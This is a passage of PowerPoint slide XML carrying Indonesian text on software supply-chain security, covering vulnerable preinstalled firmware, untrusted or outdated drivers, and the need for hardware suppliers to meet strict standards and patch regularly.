              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manufaktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muncul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membahayakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prainstal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rentan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengarah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Demikian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pula, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkenalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tumpukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tumpukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rantai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mematuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rendah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teratur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbarui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Lunak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pustaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
